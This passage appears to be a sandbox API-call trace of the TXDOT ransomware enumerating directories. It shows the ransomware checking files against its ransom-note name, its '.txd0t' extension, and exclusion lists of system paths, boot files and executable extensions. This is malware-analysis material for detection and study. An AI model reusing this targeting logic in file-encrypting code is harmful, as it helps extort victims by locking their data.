psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.568] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.568] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.568] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.568] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.568] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.568] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.568] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.568] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.568] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.568] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.568] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.568] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0071.568] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0071.568] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" [0071.568] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.568] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.568] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.568] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.569] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.569] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.569] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.569] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.569] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0071.569] GetProcessHeap () returned 0xe30000 [0071.569] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.569] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="3076", cAlternateFileName="")) returned 1 [0071.569] StrCmpW (psz1="3076", psz2=".") returned 1 [0071.569] StrCmpW (psz1="3076", psz2="..") returned 1 [0071.569] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.569] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.569] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="3076", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0071.569] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\system32\\") returned 0x0 [0071.569] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.569] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\system\\") returned 0x0 [0071.569] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.569] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.569] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\local\\") returned 0x0 [0071.569] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\boot\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\perflogs\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\programdata\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\drivers\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\wsus\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="crypt_detect") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="cryptolocker") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="ransomware") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\WINDOWS") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\Program Files") returned 0x0 [0071.570] GetProcessHeap () returned 0xe30000 [0071.570] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xecab68 [0071.570] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0071.570] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\*") returned="C:\\588bce7c90097ed212\\3076\\*" [0071.570] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0071.570] StrCmpW (psz1=".", psz2=".") returned 0 [0071.570] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.570] StrCmpW (psz1="..", psz2=".") returned 1 [0071.570] StrCmpW (psz1="..", psz2="..") returned 0 [0071.570] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.570] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.570] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.570] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0071.571] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0071.571] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned="C:\\588bce7c90097ed212\\3076\\eula.rtf" [0071.571] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.571] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.571] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.571] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.571] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.571] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.571] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.571] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.571] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.571] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.571] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.571] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.571] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.571] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.571] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0071.571] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0071.571] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" [0071.571] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.572] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.572] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.572] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.572] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.572] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.572] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.572] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.572] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.572] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.572] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.572] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.572] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.572] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.572] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0071.572] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0071.572] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" [0071.572] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.572] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.572] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.572] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.572] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.573] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.573] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.573] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.573] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.573] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0071.573] GetProcessHeap () returned 0xe30000 [0071.573] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.573] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0071.573] StrCmpW (psz1="3082", psz2=".") returned 1 [0071.573] StrCmpW (psz1="3082", psz2="..") returned 1 [0071.573] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.573] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.573] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="3082", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\system32\\") returned 0x0 [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\system\\") returned 0x0 [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\local\\") returned 0x0 [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.573] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\boot\\") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\perflogs\\") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\programdata\\") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\drivers\\") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\wsus\\") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="crypt_detect") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="cryptolocker") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="ransomware") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\WINDOWS") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\Program Files") returned 0x0 [0071.574] GetProcessHeap () returned 0xe30000 [0071.574] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xecab68 [0071.574] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0071.574] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\*") returned="C:\\588bce7c90097ed212\\3082\\*" [0071.574] FindFirstFileW (in: 